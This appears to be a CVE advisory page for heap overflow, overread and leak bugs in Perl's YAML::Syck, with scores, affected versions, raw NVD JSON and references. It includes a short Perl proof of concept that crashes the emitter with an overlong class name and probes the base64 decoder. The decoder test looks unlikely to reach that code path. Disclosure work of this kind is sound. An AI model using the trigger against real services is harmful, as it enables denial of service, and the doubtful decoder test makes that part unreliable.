Security Vulnerability Report
CVE-2026-4177 CVSS 9.1 CRITICAL

CVE-2026-4177

Published: 2026-03-16 23:16:22
Last Modified: 2026-03-23 18:17:31
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

YAML::Syck versions through 1.36 for Perl have several potential security vulnerabilities, including a high-severity heap buffer overflow in the YAML emitter. The heap overflow occurs when class names exceed the initial 512-byte allocation. The base64 decoder could read past the buffer end on trailing newlines. strtok mutated n->type_id in place, corrupting shared node data. A memory leak occurred in syck_hdlr_add_anchor when a node already had an anchor. The incoming anchor string 'a' was leaked on early return.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:toddr:yaml\:\:syck:*:*:*:*:*:perl:*:* - VULNERABLE
YAML::Syck < 1.37_01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
perl

    #!/usr/bin/env perl
    use strict;
    use warnings;

    # CVE-2026-4177 PoC - YAML::Syck Heap Buffer Overflow
    # This PoC demonstrates the heap buffer overflow when class names exceed 512 bytes
    use YAML::Syck qw(Dump Load);

    # Generate a class name longer than 512 bytes to trigger overflow
    my $long_class_name = 'A' x 600;

    # Create object with long class name
    my $obj = bless({data => 'test'}, $long_class_name);

    eval {
        # This will trigger the heap buffer overflow in YAML emitter
        my $yaml = Dump($obj);
        print "Generated YAML: $yaml\n";
    };
    if ($@) {
        print "Error occurred: $@\n";
    }

    # Additional test for base64 decoder boundary issue
    my $malicious_b64 = 'dGVzdA==' . "\n" x 10;
    print "\nTesting Base64 decoder boundary issue...\n";
    print "Malicious Base64 input: '$malicious_b64'\n";

    # This may cause buffer overread
    my $decoded = eval { Load("data:;base64,$malicious_b64") };
    print "Decoded result: $decoded\n" if defined $decoded;

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4177", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-03-16T23:16:21.543", "lastModified": "2026-03-23T18:17:31.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "YAML::Syck versions through 1.36 for Perl has several potential security vulnerabilities including a high-severity heap buffer overflow in the YAML emitter.\n\nThe heap overflow occurs when class names exceed the initial 512-byte allocation.\n\nThe base64 decoder could read past the buffer end on trailing newlines.\n\nstrtok mutated n->type_id in place, corrupting shared node data.\n\nA memory leak occurred in syck_hdlr_add_anchor when a node already had an anchor. The incoming anchor string 'a' was leaked on early return."}, {"lang": "es", "value": "Las versiones de YAML::Syck hasta la 1.36 para Perl tienen varias vulnerabilidades de seguridad potenciales, incluyendo un desbordamiento de búfer de montículo de alta gravedad en el emisor YAML.\n\nEl desbordamiento de montículo ocurre cuando los nombres de clase exceden la asignación inicial de 512 bytes.\n\nEl decodificador base64 podría leer más allá del final del búfer en saltos de línea finales.\n\nstrtok mutó n->type_id in situ, corrompiendo datos de nodo compartidos.\n\nSe produjo una fuga de memoria en syck_hdlr_add_anchor cuando un nodo ya tenía un ancla. La cadena de ancla entrante 'a' se filtró en el retorno anticipado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:toddr:yaml\\:\\:syck:*:*:*:*:*:perl:*:*", "versionEndExcluding": "1.37", "matchCriteriaId": "618F919B-87EA-4A0F-9798-D29206FA3022"}]}]}], "references": [{"url": "https://github.com/cpan-authors/YAML-Syck/commit/e8844a31c8cf0052914b198fc784ed4e6b8ae69e.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Patch"]}, {"url": "https://metacpan.org/release/TODDR/YAML-Syck-1.37_01/changes#L21", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Release Notes"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/16/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}